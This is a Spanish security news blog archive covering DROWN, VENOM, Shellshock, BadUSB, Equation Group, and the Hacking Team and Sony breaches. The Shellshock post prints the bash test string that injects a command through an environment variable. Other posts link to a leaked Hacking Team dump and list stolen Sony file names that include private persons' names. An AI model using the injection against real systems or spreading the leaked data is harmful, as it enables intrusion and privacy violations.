Mostrando entradas con la etiqueta Noticias. Mostrar todas las entradas
Mostrando entradas con la etiqueta Noticias. Mostrar todas las entradas

5 mar 2016

THE DROWN ATTACK !!

DROWN, acrónimo inglés para "Decrypting RSA with obsolete and weakened eNcryption", es como ha sido bautizado la vulnerabilidad que permite el acceso a contraseñas o números de tarjetas de crédito. La vulnerabilidad permite usar un protocolo de seguridad obsoleto, SSLv2, para atacar sitios webs modernos, comprometiendo de ésta manera los datos de millones de usuarios y webs en todo el mundo. 

Según se cita en la web del proyecto:

"DROWN es una vulnerabilidad grave que afecta a HTTPS y otros servicios que dependen de SSL y TLS, algunos de los protocolos criptográficos esenciales para la seguridad en Internet. Estos protocolos permiten a todos navegar por la web, utilizar el correo electrónico, la tienda en línea, y enviar mensajes instantáneos, sin que terceras partes sean capaces de leer la comunicación." 

"DROWN permite a un atacante romper el cifrado y leer o robar las comunicaciones sensibles, incluyendo contraseñas, números de tarjetas de crédito, los secretos comerciales o datos financieros. Nuestras mediciones indican un 33% de todos los servidores HTTPS son vulnerables al ataque."



Tu sitio es vulnerable sí...:


Un servidor es vulnerable a DROWN si:

1. 
Permite conexiones SSLv2. Esto es sorprendentemente común, debido a una mala configuración y ajustes por defecto inapropiados. Se muestran mediciones con un 17% de los servidores HTTPS todavía permiten conexiones SSLv2.

o:

2. 
Su clave privada se utiliza en cualquier otro servidor que permite conexiones SSLv2, incluso para otro protocolo. Muchas compañías reutilizar el mismo certificado y la clave en sus servidores web y correo electrónico, por ejemplo. En este caso, si el servidor de correo electrónico es compatible con SSLv2 y el servidor web no es así, un atacante puede aprovechar el servidor de correo electrónico para romper las conexiones TLS con el servidor web. Al tomar la reutilización de la clave en una cuenta, un 16% adicional de servidores HTTPS son vulnerables, poniendo 33% de los servidores HTTPS en riesgo.





Más INFO:

- Web Oficial sobre la vulnerabilidad: https://drownattack.com/

- Full Technical PAPER: https://drownattack.com/drown-attack-paper.pdf

- Check Web: https://drownattack.com/#check

- Tool para comprobar si tu entorno está afectado:

DrownMap: https://github.com/YmonOy/drownmap

- Sitios CONOCIDOS vulnerables a día de hoy:

https://drownattack.com/top-sites.html


7 ene 2016

PARCHE CRÍTICO PARA EL BLACKPHONE I

Según nos comentan los descubridores del fallo, AQUÍ, el blackphone es generalmente considerado el smartphone más seguro disponible en la actualidad. Por desgracia, no importa lo seguro que un sistema está diseñado para ser, sigue siendo vulnerable a fallos de seguridad. Recientemente Sentinelone ha descubierto una vulnerabilidad que podría permitir a un atacante controlar de forma remota las funciones del módem del teléfono.

Desarrollado por SGP Technologies, una subsidiaria de propiedad total de SilentCircle, el blackphone proporciona a los usuarios el control sobre los permisos de aplicaciones, como los servicios Silent Phone y Silent text que ayudan a anonimizar y cifrar las comunicaciones, por lo que nadie puede espiar las llamadas de voz, vídeo ni texto.

Como parte del ejercicio de ingeniería inversa que prepararón para la session de entrenamiento de Red Naga,  descubrieron que éste puerto se habia dejado abierto y accesible en el blackphone (BP1, versión 1).  Éste puerto está asociado a los modems Icera de Nvidia.

El problema reside en que, el socket abierto, podría ser utilizado por aplicaciones sin permisos adecuados para acceder a su módem de nVidia.


Los expertos explicaron que un atacante con acceso al módem podría explotar otras vulnerabilidades para ejecutar código de forma remota en el blackphone. Esto significa que un atacante podría realizar cualquier operación en el dispositivo, incluyendo el envío de mensajes de texto, visitar sitios web específicos o realizar llamadas telefónicas. Un atacante también podría aprovechar el fallo para instalar software malicioso en el dispositivo.

El fallo SÓLO afecta a la primera versión del Blackphone 1 (1.1.13 RC2), el cual incorpora el modem Icera, que ya no se fabrica, quedando excluido la segunda versión del mismo smartphone.

El problema se solucionó el día 07 de diciembre del pasado año, tras una rápida actuación por parte de Silent Circle, que en tan sólo 4 semanas tenían listo el parche. Gracias sobretodo a su programa de recompensas (Bug Bounty).

En un comunicado, el director de seguridad de Blackphone, Dan Ford, agradeció a los investigadores por contribuir a su programa de recompensas de errores.

Más INFO técnica en, VER.
Silent Circle Bug Bounty, IR.
Comunicado, Silent Circle, VER.

19 dic 2015

AGUJERO DE SEGURIDAD EN LA CRIPTOGRAFÍA CUÁNTICA

La criptografía cuántica siempre se ha considerado como una de las más seguras, si no es la más, de todas las criptografías a la hora de preservar la privacidad de la información trasmitida.

Investigadores de la Universidad de Estocolmo y la Universidad de Linköping han descubierto que esto no es siempre así, siendo vulnerable a los ataques, como revelan en una artículo publicado en 'Science Advances'.

Según comenta, el profesor de la División de Codificación de la Información de la Universidad de Linköping, Jan-Åke Larsso:

"Con este agujero de seguridad, es posible espiar el tráfico sin ser detectado. Descubrimos esto en nuestros cálculos teóricos y nuestros colegas en Estocolmo fueron posteriormente capaces de demostrarlo experimentalmente".

Por otro lado, Mohamed Bourennane, profesor de la Universidad de Estocolmo, expone:

"La criptografía cuántica es completamente seguro en teoría, pero hay que tener cuidado cuando se utiliza y puede ser hackeado, tanto en la teoría como en la práctica".

Profesor Mohamed Bourennane

La tecnología de entrelazamiento en tiempo de la energía para la encriptación cuántica estudiado aquí se basa en probar la conexión al mismo tiempo que se crea la clave de cifrado. Dos fotones se envían en exactamente el mismo tiempo en diferentes direcciones. En ambos extremos de la conexión es un interferómetro donde se añade un cambio pequeño de fase. Esto proporciona la interferencia que se utiliza para comparar similitudes en los datos de las dos estaciones. Si está siendo espiado el flujo de fotones habrá ruido, y esto puede ser revelada mediante un teorema de la mecánica cuántica - la desigualdad de Bell.

Por otro lado, si la conexión es segura y libre de ruido, puede utilizar los datos restantes, o fotones, como una clave de cifrado para proteger su mensaje.

Los investigadores de la Universidad de Linköping tienen - en sus modelos teóricos - visto que si la fuente de fotones se sustituye por una fuente de luz tradicional, un fisgón puede identificar la llave, la cadena de código. En consecuencia, también pueden leer el mensaje sin ser detectado. La prueba de la seguridad, que se basa en la desigualdad de Bell, no reacciona - a pesar de que un ataque está en marcha.

Pero este problema también se puede resolver:

"En el artículo también hemos mostrado cómo mejorar la criptografía cuántica y hacerlo más seguro", dice Mohamed Bourennane. 

[Menos  mal... : ) ]


Más INFO:


16 nov 2015

ANONYMOUS DECLARA LA "GUERRA" AL ISIS


Anonymous declara la "guerra" al grupo ISIS tras los atentados recientes en París. El grupo dijo que pondrán en marcha todas las habilidades a su alcance para realizar "Cyberataques masivos" contra ISIS. 

Según comentan en el video subido a YouTube:

“Los encontraremos y no los dejaremos escapar (...) la guerra está declarada. Prepárense". "los militantes del Estado islámico son «bichos» y Anonymous quiere darles caza", "Nosotros no perdonamos y no olvidamos". 

 

Más info: 

Make no mistake:  #Anonymous 
Is at war with #Daesh
We won't stop opposing #IslamicState
We're also better hackers. #OpISIS
    — Anonymous (@GroupAnon) November 15, 2015

Ver Video:  https://youtu.be/RwGGcZoRs-k


13 oct 2015

DELL Y EMC SE JUNTAN PARA CREAR LA MAYOR COMPAÑIA DE TECNOLOGÍA

Como han anunciado en su página, http://www.emc.com/futureready , y a través de emails a sus clientes, DELL y EMC ahora trabajaran de la mano. 


La empresa fabricante de ordenadores DELL, ha comprado la empresa fabricante de software y sistemas para administración EMC, por 59.300 millones de euros (67.000 millones de dólares).

Según comunica Joseph M. Tucci, Presidente y Director ejecutivo de EMC: 

"Esta nueva estructura nos proporcionará más flexibilidad y agilidad para enfocarla al 100 por ciento de ustedes, nuestros clientes, e invertir para obtener resultados a largo plazo para ofrecer soluciones integradas de las mejores en su clase. La compañía combinada seguirá nuestra dedicación inquebrantable a los clientes en todo el mundo, al mismo tiempo crear una nueva compañía para navegar e innovar en una nueva era en TI mejor. Vamos a proporcionar cambios en la medida que avanzamos con nuestras dos compañías juntas. Mientras tanto, los invito a visitar nuestra microsite, donde se puede encontrar información actualizada sobre esta noticia.". La web que citaba al principio, VER.


Más INFO:

24 sept 2015

EL OPM AMERICANO CONFIRMA EL ROBO DE 5.6 MILLONES DE HUELLAS DACTILARES DE SUS SERVIDORES

El OPM (Office Personnel Management) confirma el robo a través de varios hackeos de más de 5.6 millones de "fingerprints" (literalmente huellas dactilares), de sus servidores, aunque inicialmente se dijera que "sólo" eran 1.1 millones. Si contamos que la OPM actúa como la oficina de personal para el gobierno de Estados Unidos y lleva un registro de 21,5 millones, no está nada mal.


El OPM y el Departamento de Defensa estaban revisando el robo de expedientes de investigación de antecedentes cuando identificaron datos de huellas digitales adicionales que habían sido expuestos, según dijo el OPM en un comunicado.

Estamos hablando que no se trata de un número de DNI, o de seguridad social que se puede cambiar, la huella digital, si no hay problemas, viaja con nosotros siempre y es única e irremplazable; lo que hace que aún sea el tema más delicado de tratar. (Menos mál que tenemos 20 dedos en las manos... )

Por "suerte" la OPM minimizó la importancia del robo de huellas digitales diciendo que la capacidad de abusar de los datos es "actualmente limitada". Sin embargo, reconoció que el riesgo podría aumentar a medida que la tecnología mejore y las huellas dactilares se utilicen cada vez más como una garantía de la identidad.

Tanto el Departamento de Seguridad Nacional, como el FBI y el Pentágono están manos a la obra para poder aclarar todo éste tema.



18 ago 2015

BLACKPHONE 2 Y BLACKPHONE+, EN SEPTIEMBRE AÚN MÁS PRIVACIDAD EN TU MANO

Tras comprar Silent Circle a GeekPhone, ésta empresa es la que ahora llevará las riendas de todo lo que concierne a Blackphone.

Silent Circle anuncia que el nuevo Blackphone 2 saldrá a la venta en septiembre y por el momento no se conoce su precio, pero sabiendo que su predecesor se vendía por 629€, el precio rondará ésta cifra.

En cuanto a la tableta Blackphone +, de momento no se conoce mucho al respecto, sólo que será la primera tableta enfocada y concebida completamente a la privacidad del usuario.


Las principales características del Blackphone 2 son:

  • Procesador Qualcomm Snapdragon 615 Octa-Core a 64 bits.
  • Pantalla Gorilla Glass 3 de 5,5 pulgadas FullHD.
  • 3 GB de memoria RAM.
  • Almacenamiento interno de 32 GB.
  • Batería integrada de 3060 mAh.
  • Cámara trasera de 13 MP con Flash LED, y frontal de 5 MP.
  • Software Android 4.4 KitKat con Sistema propio Privat OS.





Cuentan con una Store con aplicaciones propias para aumentar la privacidad del dispositivo, apps de navegación como Ghostery nos ayudaran a ello.


Más info:

Silent Circle:

https://​silentcircle.​com/​products-and-solutions/​devices/​

13 jul 2015

CHARLA CANCELADA SOBRE PROXYHAM EN LA DEFCON 23

Se ha cancelado la charla en la próxima DEF CON 23 sobre el Router ProxyHam. ProxyHam es, en lineas generales, una Raspberry Pi con una Antena wifi, exactamente 3 antenas wifi que operan sobre la frecuencia de 900 MHz.


Como muchos ya sabreis, el Router WIFI ProxyHam ayuda a mantener el anonimato en internet ocultando la direccion IP, ocultando nuestra geolocalización en un radio de 4 Kms desde el lugar de origen, desde donde accedemos a la red. Posee unas potentes antenas que trabajan en una frecuencia de 900 MHz. Otras ventajas que tiene a parte de éstas ya citadas es que su precio es más que asequible, costando sólo 200$.

Se especula que sea el Gobierno de Estados Unidos el que esté detrás de todo ésto, por miedo al potencial que se puede sacar del Router y la posibilidad de que delincuentes lo usen para actos no tan legales. ProxyHam se creó para ayudar al anonimato en la red, pero como siempre, ésto puede tener doble cara.

También se creia en un principio, y luego se descartó, que su retirada se debiera a que incumplia las directrices tecnológicas de la FCC (Comisión Federal de Comunicaciones), donde se explica qué parámetros tienen que cumplir los dispositivos de venta al público.

¿Estaremos ante otro caso de censura por parte de un gobierno?, o ¿simplemente es por Seguridad Nacional?. Como se suele decir.. El tiempo dirá...

7 jul 2015

HACKING TEAM COMPROMETIDO

El año pasado fué Sony Pictures..., ahora le toca a HT (Hacking Team). 400 Gb de información comprometida es lo que se está barajando que se han podido filtrar. Se puede encontrar desde contraseñas de trabajadores, codigos fuente, detalles y estrategias de ventas a clientes etc. (Vamos lo típico).


HT se caracteriza por ser una empresa, más bien pequeña, o "familiar", dedicada a realizar auditorias y hacking ético y más recientemente al mundo del "software factory" de aplicaciones y/o mecanismos de infección de sistemas y dispositivos para comprometerlos de forma remota. Conocido también en el mundo como "Cyberweapons arms manufacturer".

Cabe destacar que pese a que el uso de estos programas es confidencial y completamente privado, ya han salido a la luz un listado de empresas/organismos que usan sus servicios, como son La Policia Nacional y el CNI, si nos referimos a España.


Más INFO:

Blog Bruce Schneier:

https://www.schneier.com/blog/archives/2015/07/hacking_team_is.html

Listado completo por torrent:

https://mega.co.nz/#!Xx1lhChT!rbB-LQQyRypxd5bcQnqu-IMZN20ygW_lWfdHdqpKH3E
https://ht.transparencytoolkit.org/

Github:

https://github.com/hackedteam?tab=repositories

2 jun 2015

CIERRA YOUNITED, LA NUBE DE F-SECURE

Según anuncian oficialmente en su web, Younited, "Younited by F-Secure will be discontinued on October 1, 2015".

Toda una pena para los que usabamos sus servicios, tanto via web como en el smartphone, contaba (bueno aún cuenta) con una fiabilidad excelente y un trato muy profesional.


Si entramos en su web oficial podemos ver:

"We are sorry to inform you that we are shutting down our personal cloud storage service on October1, 2015. We are refocusing our product portfolio, and younited by F-Secure will not be developed further. Younited by F-Secure and younited events by F-Secure will no longer be available after October 1, 2015".

Vendría a decir algo como:

"Lamentamos informarle que cerraremos nuestro servicio de almacenamiento personal en la nube el 01 de Octubre de 2015. Estamos reorientando nuestro catalogo de productos y Younited de F-Secure no será desarrollado más. Younited de F-Secure y Younited "events" de F-Secure ya no estarán disponibles después del 01 de Octubre de 2015".

Nos recomiendan que hagamos un backup de todos nuestros datos alojados en sus servidores y los transfiramos a otro lugar, ya sea un disco duro local, o en otro servicio en la nube. A partir de esa fecha, ya no será posible la recuperación de los datos almacenados ya que procederán al borrado del contenido de todas sus cuentas en sus servidores.

Como alternativa podemos usar cualquiera de los servicios de almacenamiento en la nube que existen, aquí podemos ver unos cuantos y sus características.

- Comparison of online backup services. VER.
- Comparison of file hosting services. VER.

Cita anterior que se hacía en el Blog sobre Younited, VER.

15 may 2015

VENOM, (VIRTUALIZED EVIRONMENT NEGLECTED OPERATIONS MANIPULATION)

Ésta es la nueva vulnerabilidad que afecta a los sistemas de virtualizacion basados en QEMU (emulador de fuente abierta), ha sido descubierta por Jason Geffner, invesitagor de CrowdStrike. Se le ha asignado el identificador CVE-2015-3456.

Se trata de un desbordamiento de buffer que afecta al emulador de FDC (Floppy Disk Controller), permitiendo a un atacante acceder al disco físico (datastore) de una máquina virtual y ejecutar código arbitrario. El fallo surge del acceso de escritura no indexado al bufer FIFO de memoria (utilizado por la capa de emulación del FDC para el almacenamiento de comandos/parámetros). Como algunas instrucciones no reinician el índice, ésto provoca el desbordamiento del bufer.



Ya estan disponibles en las diferentes plataformas, Windows, Linux, OSX su parche correspondiente. VER




Más info:

http://venom.crownstrike.com, IR.

5 abr 2015

FIN DE LA AUDITORÍA DE TRUECRYPT

Se ha completado la auditoria final sobre TrueCrypt sin ningún backdoor y con algún bug. 4 son las vulnerabilidades que han encontrado los analistas, 2 de ellas catalogadas como "High severity issues" y otras 2 como "Low severity issues" y "Undeterminated severity issues" respectivamente.


Según comenta Matthew Green:

"The TL;DR is that based on this audit, Truecrypt appears to be a relatively well-designed piece of crypto software. The NCC audit found no evidence of deliberate backdoors, or any severe design flaws that will make the software insecure in most instances".

"That doesn't mean Truecrypt is perfect. The auditors did find a few glitches and some incautious programming -- leading to a couple of issues that could, in the right circumstances, cause Truecrypt to give less assurance than we'd like it to".

En conclusión, aparentemente no hay nada que temer sobre él, dicen los expertos. 


Más INFO:

Primera entrada sobre la auditoria: VER

¿Cerrado e Inseguro?: VER

Open Crypto Audit Project TrueCrypt: VER.

17 feb 2015

EQUATION GROUP, “MEJOR” QUE STUXNET, FLAME Y REGIN

Según responsables de Kaspersky Lab, estamos ante el origen de Stuxnet y Flame, dadas las características técnicas y la forma de operar que tiene, se llama “Equation Group”, y lleva entre nosotros casi dos décadas, se sospecha que desde 1996. Kaspersky ha anunciado ésta noticia en el SAS 2015 (Security Analyst Summit 2015), congreso anual de ciberseguridad que se celebra en Cancún.


Según Dmitry Bestuzhev, director de Análisis e Investigación de Kaspersky en América Latina, ha explicado que se trata de un código malicioso con características de ciberofensiva militar, está integrado por seis módulos distintos.

La peculiaridad más es que infecta al propio hardware del disco duro, y no al software, como es habitual, por lo que éste nunca aparece como infectado aunque el aparato lo está. Incluso después de su formateo sigue infectado, ya que modifica el firmware de la unidad para que no escriba en los sectores donde se encuentra instalado.

Según sus palabras, en caso de infección, "hoy la tecnología con la que se cuenta para detectar amenazas no permite de ninguna manera curar el hardware comprometido".


Otra peculiaridad que presenta, como todo buen malware, es que es capaz de borrar sus huellas a la más mínima actividad de que puede ser descubierto. Tiene módulos personalizables dependiendo de las necesidades de extracción de la información, además, es capaz de trabajar desde Windows 95 en adelante. También posee conocimientos sobre el firmware de los discos duros de las principales marcas.
Dada su complejidad, se especula en que hay un gobierno detrás de todo esto. Según comentan los expertos de Kaspersky:

“La plataforma está controlada por gente que ama los números,  porque se usan muchas ecuaciones; en algunos casos se encuentran códigos con una rutina de cifrado de hasta 10.000 veces, una auténtica locura matemática",

Son millares las empresas que han sido infectadas por “Equation Group” por todo el mundo, desde medios de información, infraestructuras militares, gobiernos,  empresas de telecomunicaciones, agencias aeroespaciales, plataformas  de investigación nuclear, centros  científicos de nanotecnología…


Como nos  comenta Costin Raiu, director del Equipo de Análisis e Investigación Global de Kaspersky Lab:

10 ene 2015

ANONYMOUS DECLARA LA GUERRA TRAS EL ATAQUE A CHARLIE HEDBO

Éste viernes pasado el grupo ANONYMOUS declaró la guerra a los extremistas islámicos y prometió tomar venganza por el ataque a la revista satírica francesa Charlie Hedbo.

#Op Charlie Hedbo (aunque con las prisas en el video se han comido la "r"... ; ) ).


En un video publicado en YouTube, el grupo de hackers anunciaban que rastrearían los sitios web y las redes de medios sociales vinculados a los terroristas, y las tirarian abajo.

Anonymous dice: 

"We, Anonymous around the world, have decided to declare war on you the terrorists". 

"Nosotros, Anonymous de todo el mundo, hemos decidido declarar la guerra a los terroristas".

El vídeo se describe como un mensaje a "Al Qaeda, el Estado Islámico y otros terroristas", y promete vengar la muerte de las 12 personas en el ataque del miércoles.

También comentan: 

"We intend to take revenge in their name, we are going to survey your activities on the net, we are going to shut down your accounts on all social networks". 

"Tenemos la intención de tomar venganza en su nombre, vamos a examinar sus actividades en la red, vamos a cerrar sus cuentas en todas las redes sociales", declararon.



 

Se puede ver el vídeo completo en YOUTUBE, Aquí.

16 dic 2014

CIERRA GOOGLE NEWS ESPAÑA, NO COMENTS!!

Como ya sabiamos todos, Google News España cierra sus puertas hoy a 16 de Diciembre de 2014. El siguiente texto es el que reza, donde antes podiamos disfrutar de sus noticias indexadas:

"Lamentamos tener que informarte que Google Noticias ha cerrado en España y que las publicaciones de los editores españoles ya no aparecen en Google Noticias, a raíz de los recientes cambios en la legislación española. Comprendemos que usuarios como tú podáis estar descontentos con esta nueva situación y por ello queremos explicarte las razones por las cuales hemos tomado esta decisión.

Google Noticias es un servicio gratuito, que utilizan y aprecian millones de usuarios de todo el mundo y que en la actualidad se encuentra disponible en más de 70 ediciones internacionales y en 35 idiomas. Incluye desde los periódicos nacionales, hasta las pequeñas publicaciones locales, medios especializados y blogs. Los editores pueden elegir si quieren que sus artículos aparezcan en Google Noticias o no y, por razones de peso, la inmensa mayoría opta por su inclusión. Google Noticias crea un verdadero valor para estas publicaciones al dirigir tráfico de usuarios a sus sitios web, lo que a su vez les ayuda a generar ingresos publicitarios.

Tras la aprobación de la reforma de la Ley de Propiedad Intelectual hemos tenido que cerrar el servicio de Google Noticias en España. Esta nueva legislación obliga a cualquier publicación española a cobrar, quiera o no, a servicios como Google Noticias por mostrar el más mínimo fragmento de sus publicaciones. Dado que Google Noticias es un servicio que no genera ingresos (no mostramos publicidad en el sitio web), este nuevo enfoque resulta sencillamente insostenible. 

Desde Google vamos a seguir manteniendo nuestro compromiso de ayudar y trabajar con el sector de la información, al igual que con nuestros miles de socios en todo el mundo, incluidos los de España, para ayudarles a incrementar sus lectores e ingresos en Internet." 

En muchos casos, decisiones así, conllevan grandes consecuencias y en su mayoría negativamente. Si no tiempo al tiempo.

Una gran cantidad de visitas a webs de periodicos de tirada nacional por parte de personas de entre 17-30 años, se realizaba a través de las noticias indexadas/relacionadas que Google ofrecia. Practicamente nadie, menos del 5% de las personas de ese rango de edad consultan directamente en las propias webs de los diarios. Por lo que el número de visitas que van ha recibir, se reducirá considerablemente, si no toman medidas.

26 nov 2014

POSIBLE INTRUSIÓN EN SONY PICTURES

Aunque todavía no lo han confirmado oficialmente la gente de SONY, todo apunta a que el grupo hacker conocido cómo GOP (Guardians of Peace), ha conseguido acceder a la intranet de Sony y obtener información sobre ellos, incluyendo documentos secretos, passwords, etc. cómo se puede observar en la imagen. Ésta imagen es la que aparece en todos los sistemas hackeados.


También los miembros de GOP habrían podido hacerse con cuentas de Twitter temporalmente, siendo éstas recuperadas al poco tiempo por Sony Pictures.

El ataque fué tan contundente que para evitar males mayores el personal de Sony Pictures tomó la decisión de desconectarse de Internet, desconectar todo tipo de conexión WIFI e incluso a algunos trabajadores les recomendarón irse a sus casas.

Según GOP han dejado un archivo de más de 200 Mb con el detalle de nombres de archivos que han borrado del sistema.

Éstos datos, detallados en dos listas, contienen más de 18 millones de entradas y 19 millones respectivamente, incluyendo documentos en .pdf, .doc, archivos de texto con contraseñas, bases de datos....

Ejemplos de nombres de archivos supuestamente sustraidos :

list1.txt:Netflix Is Killing BitTorrent in The US _ TorrentFreak.pdf
list1.txt:Torrent Spy Damages List.xls
list1.txt:Article- Hollywood Studios Fuming Over BitTorrent, Cinedigm 'Deal With the Devil'-TheWrap-4-24-13.doc
list1.txt:Article-File-Sharers Will Not Be Held Liable For Piracy, Russia Says-Torrentfreak-4-8-13.doc
list1.txt:Article- Operator of Germany's Torrent.to Gets Prison Sentence Amid Piracy Crackdown-THR-5-6-13.doc
list1.txt:Article-France Set To Dump 3 Strikes Anti-Piracy Law But Automated Fines Will Live On-TorrentFreak-5-14-13.doc
list1.txt:MASTER TORRENT STATS SHEET_021712.xlsx
list1.txt:Bill Backup 2014-11-01.xls
list1.txt:Closer - Icarus Prods tolling 2014-11-20.pdf
list1.txt:The Pirate Bay - The galaxy's most resilient bittorrent site.pdf
list1.txt:CPII & TSP Verifications - TorrentSpy.pdf
list1.txt:TorrentSpy Stats Study (Sony Titles).xls
list1.txt:TorrentSpy Decl. - SPE 11.29.pdf
list1.txt:MTORRENTEMIP-TV.DOC
list1.txt:BitTorrent-Garfield-2-09-05.DOC
list1.txt:Torrentspy Pleadings.doc
list1.txt:Torrentspy Discovery.doc
list1.txt:TorrentSpy_Parker_POC_TriStar_012809.pdf
list1.txt:Bittorrent Blocking Meeting.pptx
list1.txt:Bittorrent-Emule Report -2012-02-21 thru 2012-02-27.pdf
list1.txt:Bittorrent Report - 2012-04-15 thru 2012-05-15.xlsx
list1.txt:torrentz 3.13 vs.doc
list1.txt:torrentreactor 7 15 vs.doc
list1.txt:torrentreactor net 11 19 vs.doc
list1.txt:02.06 torrentmatrix.vs.doc
list1.txt:Youporn Materials Release.pdf
list1.txt:Anne Cox release form non disclosure agreement.pdf
list1.txt:Karen Payne release form? non disclosure agreement.pdf
list1.txt:Geoff Payne release form? non disclosure agreement.pdf
list1.txt:Anne Cox release form? non disclosure agreement.pdf
list1.txt:FY10 GISP Encryption Strategy Budget.xls
list1.txt:Inventory-encryption SPE full.xls
list1.txt:Inventory-encryption SPE Other.xls
list1.txt:Inventory-encryption SPE HR.xls
list1.txt:080128 Laptop Encryption CBA.xls
list1.txt:McAfee_Encrypted_USB_1_1_User_Guide.pdf
list1.txt:IDM Responsible Party DRM - Email Encrypt - 7-Zip Inquiry.docx
list1.txt:081120 Laptop Encryption - PGP Technical Installation Guide v3.doc
list1.txt:Encrypted Satellite Rider - Italy.docx
list2.txt:LBL_2014-11-27_LBL BLACK FRIDAY PROMO_v1.xlsb
list2.txt:vanessahudgens_nude_04.jpg
list2.txt:Felicia Goldstein Susan Rudow Nudelman Elaine Trapasso .jpg
list2.txt:Felicia Goldstein Susan Rudow Nudelman Sandra Brauer Udasco Elaine Trapasso.jpg
list2.txt:big_pic_nude copy.jpg
list2.txt:big_pic_nude copy.jpg
list2.txt:30 MINUTES OR LESS SPIKE FINAL-PORN.mov
list2.txt:30min-SP-2-Porn 7-27.mov
list2.txt:amilano@www.espn.go[1].txt
list2.txt:esitaras@www.eshop.msn[2].txt
list2.txt:esitaras@www.eshop[1].txt
list2.txt:esitaras@www.essential-oil[1].txt
list2.txt:reports_encrypted5254.zip
list2.txt:reports_encrypted3529.zip
list2.txt:SecurityBO.class
list2.txt:EncryptService.class
list2.txt:EncryptServiceImpl.class
list2.txt:StringToEncryptedStringMigrator.class
list2.txt:vmware3_keygen.zip
list2.txt:keygen.exe
list2.txt:Final_Draft_7.0.0.40_Keygen.zip
list2.txt:Writers.Cafe.v1.20.WinALL.Incl.Keygen-ViRiLiTY.zip
list2.txt:Corel Draw X5 with Keygen.lnk
list2.txt:Keygen.exe

Podemos encontrarnos desde documentación sobre cifrado, código fuente, archivos con contraseñas, hacking, e incluso algún video porno y algún keygen, para que luego digan...

Según mi opinión y varias fuentes de blogs/períodicos de renombre, de ser verdad ésta noticia, y la cantidad de información que se haría pública, podría suponer incluso al cierre de la compañía.


INFO:

Lista en Reddit, VER.
BBC, VER.



6 nov 2014

DETENIDO EL ADMIN DE SILK ROAD 2.0

Esto es lo que nos podemos encontrar si intentamos acceder a través de TOR a Silk Road 2.0.

Agentes federales de New York han detenido a un hombre como responsable del mantenimiento de éste servicio. Blake Benthall de 26 años, conocido como “Defcon,” ha sido, como digo, detenido en la ciudad de San Francisco.




Más INFO:

VER.

9 oct 2014

EL CÓDIGO DE BADUSB YA ESTÁ EN GITHUB

Aunque en un principio se dijo que no se haría público el código por su alta peligrosidad, no ha sido así, ya podemos disponer de él alojado en GitHub, AQUÍ.

El problema descubierto por los investigadores de BadUsb, y presentado por Karsten Nohl reside en la posibilidad de modificar el firmware de un dispositivo USB y añadirle funcionalidades adicionales.

Según los desarroladores se consigue alterar el firmware de los dispositivos aplicandole ingeniería inversa,  y heurística y así poder incorporar características adicionales, tales como cargar un exploit en el ordenador de la victima. Funcionaría en cualquier S.O., dependiendo de cual estemos usando, se necesitaría realizar una escalada de privilegios, como es en el caso de los sistemas operativos GNU/Linux.


Ésta vulnerabilidad además de afectar a pendrives, también lo haría con cualquier dispositivo que utilice USB, tanto cámaras web, discos duros externos, teclados..., aunqué no está comprobado en éstos todavía al 100%.

También se podría utilizar ésta vulnerabilidad para realizar ataques através de la red, usando un pendrive modificado y haciendose pasar éste por un adaptador de red Ethernet en el sistema objetivo y respondiendo a peticiones DHCP realizadas desde el sistema pero sin asignar una puerta de enlace. Esto se traduce en que si estamos conectados a una red Wi-Fi e introducimos un USB modificado en nuestro sistema, seguiremos navegando sin problema; pero las peticiones DNS que realicemos a la hora de acceder a una web, por ejemplo, serán gestionadas por el servidor cargado desde el pendrive, lo que permite ataques de redirección de tráfico que nos pueden llevar a sitios maliciosos que aparentan ser legítimos.

Tambíén se podría modificar para reconocer el tipo de BIOS y así ocultar el contenido malicioso, reescribir datos al vuelo e incorporar malware ... [todo lo que nuestra imaginación quiera, dentro de unos límites].

Pocas soluciones se dan a éste problema, una de ellas es que los fabricantes cambiaran y actualizaran sus firmwares y que el estándar cambiara, cosa poco probable ya que tardarían incluso hasta 10 años en hacerlo.

Aún sabiendo todo ésto, Adam Caudill y Brandon Wilson han tomado la decisión de hacer público el código y colgarlo en GitHub. ¡Gracias amigos! [Ironía].

¿Será éste el fin del USB tal y cómo lo conocemos?, ¿tendremos que cambiarnos a otros puertos de conexión como Thunderbolt o Lightning ?, Esperemos que nó.

Codigo en GitHub: VER.

Fuente:

Blog Bruce Schneier: VER.
Otros...

30 sept 2014

SHELLSHOCK, TODO LO QUE NECESITAS SABER HASTA LA FECHA


Mucho se ha escrito y comentado al respecto sobre "Shellshock", por eso he decidido hacer un resumen con mucha de la información que se conoce al respecto hasta la fecha, sin entrar en demasiados detalles técnicos. La información procede de diversas fuentes y necesitaría mucho tiempo y dedicarle una entrada completa para citar todas, así que nombraré alguna de ellas al final del artículo.

Sobre el día 24 se dió a conocer una vulnerabilidad crítica en Bash, (acrónimo de Bourne-Again Shell) intérprete de comandos de Linux, BSD, y Mac OS X. Se registró como, CVE-2014-6271, pero más tarde se le ha reasignado a CVE-2014-7169, se ha asignado para cubrir la vulnerabilidad que todavía está presente después de la solución incorrecta.

Shellshock crea un punto débil que sirve como una puerta trasera para que un hacker ejecute comandos, hacerse cargo de una máquina, profundizar en los servidores, robar datos y desfigurar sitios web. La mayoría de los ordenadores y dispositivos domésticos habilitados para Internet, tales como routers, Wi-Fi, etc.

Webcams por ejemplo, son a menudo basados ​​en Linux y estos dispositivos también pueden ser hackeados y se utilizan como vectores de infección. Este problema se extiende a los dispositivos inteligentes conectados a el "Internet de las cosas", que se encuentra en cualquier lugar y en todas partes, incluyendo hospitales, centrales de energía, e incluso escuelas. Esto significa que incluso con una vulnerabilidad mínima en un dispositivo podría abrir las puertas a un posible ataque aún mayor.



GNU Bash a través de procesos 4.3 arrastran cadenas después de la definición de funciones en los valores de las variables de entorno, lo que permite a atacantes remotos ejecutar código arbitrario a través de un entorno hecho a mano, como se demuestra por los vectores que involucran la función ForceCommand en OpenSSH sshd, los módulos mod_cgi y mod_cgid en el Apache HTTP Server, scripts ejecutados por los clientes DHCP no especificados, y otras situaciones en las que establecer el medio se produce a través de una frontera privilegio de ejecución Bash, también conocido como "Shellshock"

Para comprobar la vulnerabilidad en sistemas *NIX, simplemente hay que proceder de la siguiente manera:

1. Ejecuta el comando siguiente, no hace falta ser "Root":

1| env testbug='() { :;}; echo VULNERABLE' bash -c "echo Hello"

2.  Si te devuelve:

1| VULNERABLE
2| Hello

El sistema es vulnerable. Por el contrario si ves:

1| bash: warning: testbug: ignoring function definition attempt
2| bash: error importing function definition for `testbug'
3| Hello

Su sistema NO es vulnerable.

